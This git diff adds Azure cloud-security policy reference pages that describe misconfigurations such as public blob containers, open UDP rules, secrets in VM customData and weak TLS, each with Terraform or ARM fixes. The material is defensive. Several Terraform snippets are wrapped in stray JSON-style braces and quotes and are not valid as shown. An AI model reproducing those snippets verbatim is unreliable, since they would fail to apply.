+|Terraform, TerraformPlan + +|=== + + + +=== Description + + +As a best practice, do not allow anonymous/public access to blob containers unless you have a very good reason. +Instead, you should consider using a shared access signature token for providing controlled and time-limited access to blob containers. 'Public access level' allows you to grant anonymous/public read access to a container and the blobs within Azure blob storage. + +By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to the Azure portal + +. Navigate to 'Storage Accounts' + +. Select the reported storage account + +. Under 'Blob service' section, Select 'Containers' + +. Select the blob container you need to modify + +. Click on 'Change access level' + +. Set 'Public access level' to 'Private (no anonymous access)' + +. Click on 'OK' +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Arguments:* allow_blob_public_access + + +[source,go] +---- +{ + " resource "azurerm_storage_account" "example" { + ... ++ allow_blob_public_access = false + ... + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc new file mode 100644 index 000000000..8771acf80 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc @@ -0,0 +1,65 @@ +== Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol +// Azure Network Security Group with overly permissive inbound rule to all traffic on UDP protocol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d979e854-a50d-11e8-98d0-529269fb1459 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py[CKV_AZURE_77] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Disable Internet exposed UDP ports on network security groups. +The potential security problem with broadly exposing UDP services over the Internet is that attackers can use DDoS amplification techniques to reflect spoofed UDP traffic from Azure Virtual Machines. +The most common types of these attacks use exposed DNS, NTP, SSDP, SNMP, CLDAP and other UDP-based services as amplification source for disrupting services of other machines on the Azure Virtual Network or even attack networked devices outside of Azure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_group +* *Arguments:* protocol + + +[source,go] +---- +resource "azurerm_network_security_group" "example" { + + security_rule { + name = "test123" + priority = 100 + direction = "Inbound" ++ access = "Deny" ++ protocol = "Udp" + source_port_range = "*" + destination_port_range = "*" + source_address_prefix = "*" + destination_address_prefix = "*" + } + ... + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc new file mode 100644 index 000000000..ef2f51e0a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc @@ -0,0 +1,125 @@ +== Azure Storage Account default network access is set to 'Allow' +// Azure Storage Account default network access set to 'Allow' + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 991aca47-286f-45be-8737-ff9c069beab6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py[CKV_AZURE_35] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Restricting default network access helps to provide an additional layer of security. +By default, storage accounts accept connections from clients on any network. +To limit access to selected networks, the default action must be changed. +We recommend you configure storage accounts to *deny* access to traffic from all networks, including internet traffic. +At an appropriate time, access can be granted to traffic from specific Azure Virtual networks, allowing a secure network boundary for specific applications to be built. +Access can also be granted to public internet IP address ranges enabling connections from specific internet or on-premises clients. +When network rules are configured only applications from allowed networks can access a storage account. +When calling from an allowed network applications continue to require authorization, such as a valid access key or SAS token, to access the storage account. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Storage Accounts*. + +. For each storage account: a) Navigate to * Settings* menu. ++ +b) Click * Firewalls and virtual networks*. ++ +c) For selected networks, select * Allow access*. ++ +d) Add rules to allow traffic from specific network. ++ +e) To apply changes,click * Save*. + + +* CLI Command* + + +To update * default-action* to * Deny*, use the following command: +---- +az storage account update +--name & lt;StorageAccountName> +--resource-group &l t;resourceGroupName> +--default-action Deny +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account_network_rules +* *Arguments:* default_action + + +[source,go] +---- +{ + "resource "azurerm_storage_account_network_rules" "test" { + resource_group_name = azurerm_resource_group.test.name + storage_account_name = azurerm_storage_account.test.name + ++ default_action = "Deny" +}", + +} +---- + +In a Storage Account: + + +[source,go] +---- +{ + "resource "azurerm_storage_account" "test" { + name = var.watcher + resource_group_name = azurerm_resource_group.test.name + location = azurerm_resource_group.test.location + ++ network_rules { ++ default_action="Deny" ++ } + + account_tier = "Standard" + account_kind = "StorageV2" + account_replication_type = "LRS" + enable_https_traffic_only = true +}", + + +} +---- + +*Suppression Advice* + +This can trigger incorrectly on _azurerm_storage_account_ when using correctly configured _azurerm_storage_account_network_rules_, if this occurs suppression is reasonable. diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc new file mode 100644 index 000000000..7b5f4de2c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc @@ -0,0 +1,117 @@ +== Azure storage account has a blob container that is publicly accessible +// Azure storage account has a publicly accessible blob container + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0b894ba-b341-4730-b7c6-0f8234f2ce8f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py[CKV_AZURE_34] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Azure storage account has a blob container that is publicly accessible* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e0b894ba-b341-4730-b7c6-0f8234f2ce8f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py [CKV_AZURE_34] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + +//// + +=== Description + + +Anonymous, public read access to a container and its blobs can be enabled in Azure Blob storage. +It grants read-only access to these resources without sharing the account key or requiring a shared access signature. +We recommend you do not provide anonymous access to blob containers until, and unless, it is strongly desired. +A shared access signature token should be used for providing controlled and timed access to blob containers. + +//// +=== Fix - Runtime + + +* Azure Portal To begin, follow Microsoft documentation and create shared access signature tokens for your blob containers.* + + +When complete, change the policy using the Azure Portal to deny anonymous access following these steps: + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Storage Accounts*. + +. For each storage account: a) Navigate to * BLOB SERVICE*. ++ +b) Select * Containers*. ++ +c) For each * Container*: (i) Click * Access policy*. ++ +(ii) Set * Public Access Level* to* Private**. + + +* CLI Command* + + +To set the permission for public access to private (off) for a specific blob container, use the container's name with the following command: +---- +az storage container set-permission +--name & lt;containerName> +--public-access off +--account-name & lt;accountName> +--account-key & lt;accountKey> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_container +* *Arguments:* container_access_type + + +[source,go] +---- +resource "azurerm_storage_container" "example" { + ... ++ container_access_type = "private" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-policies.adoc b/code-security/policy-reference/azure-policies/azure-policies.adoc new file mode 100644 index 000000000..0b6c6a837 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-policies.adoc @@ -0,0 +1,3 @@ +== Azure Policies + + diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc new file mode 100644 index 000000000..987c2141e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc @@ -0,0 +1,19 @@ +== Azure Secrets Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-secrets-2.adoc[Secrets are exposed in Azure VM customData] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] +|HIGH + + +|xref:set-an-expiration-date-on-all-secrets.adoc[Azure Key Vault secrets does not have expiration date] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc new file mode 100644 index 000000000..d21d23534 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc @@ -0,0 +1,95 @@ +== Secrets are exposed in Azure VM customData +// Secrets exposed in Azure VM customData + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b006d03f-1272-4de1-ba20-106ef7c09109 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Secrets are exposed in Azure VM customData* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b006d03f-1272-4de1-ba20-106ef7c09109 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +The Azure VM metadata field *customData* allows custom code to run right after the VM is launched. +It contains code exposed to any entity which has the most basic access to the VM, including read-only of configurations. +The code is not encrypted. +We recommend you use Azure Key Vault to access secrets from the VM. +Removing secrets from unencrypted places which can be easily accessed reduces the risk of passwords, private keys and more from being exposed to third parties. +//// +=== Fix - Runtime +A Runtime Remediation is not applicable in this case because custom data cannot be modified on an existing VM. +A new VM must be created with different custom data. +//// +=== Fix - Buildtime + + +*Terraform* + + +Remove the following attribute from the Terraform resource. + + +[source,go] +---- +{ + "resource "azurerm_virtual_machine" "main" { + name = "${var.prefix}-vm" + ... + os_profile { + ... +- custom_data = "MY_SECRET_VALUE" + } + + ... +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc new file mode 100644 index 000000000..637411416 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc @@ -0,0 +1,117 @@ +== Azure Key Vault secrets does not have expiration date +// Azure Key Vault secrets do not have expiration dates + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f75c8a06-27af-4588-8e30-dd25f3be2c20 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Azure Key Vault secrets does not have expiration date* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f75c8a06-27af-4588-8e30-dd25f3be2c20 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +The Azure Key Vault (AKV) enables users to store and keep secrets within the Microsoft Azure environment. +Secrets in the AKV are octet sequences with a maximum size of 25k bytes each. +The exp (expiration time) attribute identifies the expiration time on or after which the secret must not be used. +By default, secrets do not expire. +We recommend you rotate secrets in the key vault and set an explicit expiration time for all secrets. +This ensures that the secrets cannot be used beyond their assigned lifetimes. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Key vaults*. + +. For each Key vault: a) Click * Secrets*. ++ +b) Navigate to * Settings*. ++ +c) Set * Enabled?* to * Yes*. ++ +d) Set an appropriate * EXPIRATION DATE* on all secrets. + + +* CLI Command* + + +To set an * EXPIRATION DATE* on all secrets, use the following command: +---- +az keyvault secret set-attributes +--name & lt;secretName> +--vault-name & lt;vaultName> +--expires Y-m-d'T'H:M:S'Z' +---- + +=== Fix - Buildtime +//// + +*Terraform* + + +* *Resource:* azurerm_key_vault_secret +* *Arguments:* expiration_date + + +[source,go] +---- +resource "azurerm_key_vault_secret" "example" { + ... + + expiration_date = "2020-12-30T20:00:00Z" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc new file mode 100644 index 000000000..f1e90a7f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc @@ -0,0 +1,24 @@ +== Azure Storage Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-storage-2.adoc[Azure Storage Account using insecure TLS version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py[CKV_AZURE_44] +|MEDIUM + + +|xref:bc-azr-storage-4.adoc[Azure Cosmos DB key based authentication is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py[CKV_AZURE_132] +|MEDIUM + + +|xref:ensure-storage-accounts-adhere-to-the-naming-rules.adoc[Storage Account name does not follow naming rules] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc new file mode 100644 index 000000000..4a8935952 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc @@ -0,0 +1,158 @@ +== Azure Storage Account using insecure TLS version +// Azure Storage Account uses insecure version of TLS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 91389569-c060-44e0-9aef-f13dba594f3c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py[CKV_AZURE_44] + +|Severity +|MEDIUM + +|Subtype +|Build, +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Communication between a client application and an Azure Storage account is encrypted using Transport Layer Security (TLS). +TLS is a standard cryptographic protocol that ensures privacy and data integrity between clients and services over the Internet. +Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. +Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. +To follow security best practices and the latest PCI compliance standards, Microsoft recommends enabling the latest version of TLS protocol (TLS 1.2) for all your Microsoft Azure App Service web applications. +PCI DSS information security standard requires that all websites accepting credit card payments uses TLS 1.2 after June 30, 2018. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to your * storage account*. + +. Select * Configuration*. + +. Under * Minimum TLS version*, use the drop-down to select the minimum version of TLS required to access data in this storage account, as shown in the following image. + + +* CLI Command* + + +The minimumTlsVersion property is not set by default when you create a storage account with Azure CLI. +This property does not return a value until you explicitly set it. +The storage account permits requests sent with TLS version 1.0 or greater if the property value is null. + + +[source,shell] +---- +{ + "az storage account create \\ + --name & lt;storage-account> \\ + --resource-group & lt;resource-group> \\ + --kind StorageV2 \\ + --location & lt;location> \\ + --min-tls-version TLS1_1 + +az storage account show \\ + --name & lt;storage-account> \\ + --resource-group & lt;resource-group> \\ + --query minimumTlsVersion \\ + --output tsv + +az storage account update \\ + --name & lt;storage-account> \\ + --resource-group & lt;resource-group> \\ + --min-tls-version TLS1_2 + +az storage account show \\ + --name & lt;storage-account> \\ + --resource-group & lt;resource-group> \\ + --query minimumTlsVersion \\ + --output tsv", +} +---- +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Attribute:* min_tls_version (Optional) The minimum supported TLS version for the storage account. + +Possible values are TLS1_0, TLS1_1, and TLS1_2. +Defaults to TLS1_0 for new storage accounts. +Use TLS1_2. + + +[source,go] +---- +---- +{ + "resource "azurerm_storage_account" "test" { + ... ++ min_tls_version = "TLS1_2" + ... +}", + + +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.Storage/storageAccounts +* *Arguments:* minimumTlsVersion To configure the minimum TLS version for a storage account with a template, create a template with the MinimumTLSVersion property set to TLS1_0, TLS1_1, or TLS1_2. + + +[source,go] +---- +---- +{ + "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": { + "storageAccountName": "[concat(uniqueString(subscription().subscriptionId), 'tls')]" + }, + "resources": [ + { + "name": "[variables('storageAccountName')]", + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2019-06-01", + "location": "", + "properties": { + "minimumTlsVersion": "TLS1_2" + }, + "dependsOn": [], + "sku": { + "name": "Standard_GRS" + }, + "kind": "StorageV2", + "tags": {} + } + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc new file mode 100644 index 000000000..af37d3647 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc @@ -0,0 +1,117 @@ +== Azure Cosmos DB key based authentication is enabled +// Azure Cosmos DB key based authentication enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8fc7b6c0-d6c2-4f29-ad98-d837e7a74ec7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py[CKV_AZURE_132] + +|Severity +|MEDIUM + +|Subtype +|Build, +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +* Azure Cosmos DB key based authentication is enabled* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8fc7b6c0-d6c2-4f29-ad98-d837e7a74ec7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py [CKV_AZURE_132] + +|Severity +|MEDIUM + +|Subtype +|Build +, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +In 2019, Microsoft added a feature called Jupyter Notebook to Cosmos DB that lets customers visualize their data and create customized views. +The feature was automatically turned on for all Cosmos DBs in February 2021. +A series of misconfigurations in the notebook feature opened up a new attack vector - the notebook container allowed for a privilege escalation into other customer notebooks. +As a result, an attacker could gain access to customers`' Cosmos DB primary keys and other highly sensitive secrets such as the notebook blob storage access token. +For more details visit - https://msrc-blog.microsoft.com/2021/08/27/update-on-vulnerability-in-the-azure-cosmos-db-jupyter-notebook-feature/ +One way to reduce risk is to prevent management plane changes for clients using key based authentication. +CosmosDB access keys are mainly used by applications to access data in CosmosDB containers. +It is rare for organizations to have use cases where the keys are used to make management changes. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* access_key_metadata_writes_enabled + + +[source,go] +---- +resource "azurerm_cosmosdb_account" "db" { + name = "db" + ... ++ access_key_metadata_writes_enabled = false +} +---- + + + +*ARM Templates* + + +* *Resource:* encryptionOperation +* *Arguments:* EnableEncryption + + +[source,go] +---- +{ + "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#", + "contentVersion": "1.0.0.0", + ... + "resources": [ + { + "type": "Microsoft.DocumentDB/databaseAccounts", + "apiVersion": "2018-07-01", + "name": "db", + "properties": { + ... ++ "disableKeyBasedMetadataWriteAccess": true, + } + } + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc new file mode 100644 index 000000000..30aeaf883 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc @@ -0,0 +1,58 @@ +== Storage Account name does not follow naming rules +// Azure Storage Account name does not follow naming rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f06c6dbe-be9e-4966-b9ac-18fbe7f016c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Azure has the following https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts[rules for naming] your storage account: + +* Names must be between 3 and 24 characters long +* Names may contain numbers and lowercase letters only +* Your storage account name must be unique + +This policy ensures that you have not provided an invalid name for your Storage Account. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "azurerm_storage_account" "camel_case" { +- name = "this-Is-Wrong" ++ name = "thisisright" +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc b/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc new file mode 100644 index 000000000..7103ea968 --- /dev/null +++ b/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc @@ -0,0 +1,57 @@ +== MariaDB servers do not have public network access enabled set to False +// Azure MariaDB servers public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c9a786ca-5dc6-4a66-a303-3f9c0a863b52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py[CKV_AZURE_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +It is generally a good security practice to ensure that your MariaDB servers do not have public network access enabled, as this means that they are only accessible from within your private network. +This can help to protect your database servers from unauthorized access, as external parties will not be able to connect to them over the internet. +It is especially important to ensure that public network access is disabled if your MariaDB servers contain sensitive or confidential data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_server +* *Arguments:* public_network_access_enabled is set to False. + + +[source,go] +---- +{ + "resource "azurerm_mariadb_server" "example" { + ... ++ public_network_access_enabled = false + +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc b/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc new file mode 100644 index 000000000..a6eeba7c1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc @@ -0,0 +1,14 @@ +== Public Policies 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-public-1.adoc[MariaDB servers do not have public network access enabled set to False] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py[CKV_AZURE_48] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/book.yml b/code-security/policy-reference/book.yml new file mode 100644 index 000000000..b16e75a21 --- /dev/null +++ b/code-security/policy-reference/book.yml @@ -0,0 +1,2166 @@ +# The ordering of the records in this document determines the ordering of the +# topic groups and topics. +--- +kind: book +title: Prisma Cloud Code Security Policy Reference +version: 1.0.0 +author: Prisma Cloud Team +ditamap: prisma-cloud-code-security-policy-reference +dita: techdocs/en_US/dita/test/prisma/prisma-cloud-policy-reference +--- +kind: chapter +name: Get Started with Prisma Cloud Code Security Policies +dir: get-started-code-sec-policies +topics: +- name: Prisma Cloud Code Security Policy Reference + file: get-started-code-sec-policies.adoc +--- +kind: chapter +name: Alibaba Policies +dir: alibaba-policies +topics: +- name: Alibaba Policies + file: alibaba-policies.adoc +- name: Alibaba General Policies + dir: alibaba-general-policies + topics: + - name: Alibaba General Policies + file: alibaba-general-policies.adoc + - name: Alibaba Cloud database instance accessible to public + file: ensure-alibaba-cloud-database-instance-is-not-public.adoc + - name: Alibaba Cloud Disk is not encrypted with Customer Master Key + file: ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc + - name: Alibaba Cloud disk encryption is disabled + file: ensure-alibaba-cloud-disk-is-encrypted.adoc + - name: Alibaba Cloud KMS Key Rotation is disabled + file: ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc + - name: Alibaba Cloud MongoDB does not have transparent data encryption enabled + file: ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc + - name: Alibaba Cloud OSS bucket has transfer Acceleration disabled + file: ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc + - name: Alibaba Cloud OSS bucket has versioning disabled + file: ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc + - name: Alibaba Cloud OSS bucket is not encrypted with Customer Master Key + file: ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc + - name: Alibaba Cloud OSS bucket accessible to public + file: ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc + - name: Alibaba Cloud RDS instance has log_disconnections disabled + file: ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc + - name: Alibaba Cloud KMS Key is disabled + file: ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc + - name: Alibaba Cloud RDS instance does not have log_duration enabled + file: ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc + - name: Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions + file: ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc + - name: Alibaba Cloud RDS log audit is disabled + file: ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc + - name: Alibaba RDS instance has log_connections disabled + file: ensure-alibaba-rds-instance-has-log-connections-enabled.adoc +- name: Alibaba IAM Policies + dir: alibaba-iam-policies + topics: + - name: Alibaba IAM Policies + file: alibaba-iam-policies.adoc + - name: Alibaba Cloud RAM password policy maximal login attempts is more than 4 + file: ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc + - name: Alibaba Cloud RAM does not enforce MFA + file: ensure-alibaba-cloud-ram-enforces-mfa.adoc + - name: Alibaba Cloud RAM password policy does not expire in 90 days + file: ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc + - name: Alibaba Cloud RAM password policy does not prevent password reuse + file: ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc + - name: Alibaba Cloud RAM password policy does not have a lowercase character + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc + - name: Alibaba Cloud RAM password policy does not have a number + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc + - name: Alibaba Cloud RAM password policy does not have a symbol + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc + - name: Alibaba Cloud RAM password policy does not have an uppercase character + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc + - name: Alibaba Cloud RAM password policy does not have a minimum of 14 characters + file: ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc +- name: Alibaba Kubernetes Policies + dir: alibaba-kubernetes-policies + topics: + - name: Alibaba Kubernetes Policies + file: alibaba-kubernetes-policies.adoc + - name: Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies + file: ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc + - name: Alibaba Cloud Kubernetes node pools are not set to auto repair + file: ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc +- name: Alibaba Logging Policies + dir: alibaba-logging-policies + topics: + - name: Alibaba Logging Policies + file: alibaba-logging-policies.adoc + - name: Alibaba Cloud Action 